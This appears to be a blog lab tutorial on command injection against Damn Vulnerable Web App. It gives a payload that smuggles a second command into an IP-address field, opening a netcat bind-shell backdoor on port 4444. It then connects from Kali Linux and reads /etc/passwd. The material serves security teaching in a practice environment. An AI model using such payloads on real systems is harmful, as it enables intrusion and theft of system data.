In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.
Background:
Background:
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- What is Command Execution?
- Command Execution is where a website application provides the ability to execute system commands.
- What is a Command Injection Attack?
- The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
- In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
as an authorized system user. - Note, the commands are executed with the same privileges as the application and/or web server.
- Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
- What is a Command Injection Listener Attack?
- A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
- Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
- Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Lab:
1) Access DVWA application on your browser.
2) Click on Command Injection
3) Pass below data as argument in text box and lick on submit.
192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
- Make a FIFO named pipe.
- Pipes allow separate processes to communicate without having been designed explicitly to work together.
- This will allow two processes to connect to netcat.
- nc -l 4444, tells netcat to listen and allow connections on port 4444.
- 192.168.43.118 is IP address of DVWA applciation.
4) Point 3 will open a back door to access DVWA machine.
5) Now Login to your Kali Linux machine.
6) Now Use NetCat on Kali Linux to access DVWA instance.
- nc 192.168.43.209 4444
- Use Kali Linux to Connect to DVWA Netcat session on port 4444
- hostname
- This is server hostname that hosts DVWA.
- cat /etc/passwd
- Show content of the /etc/passwd file
Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine.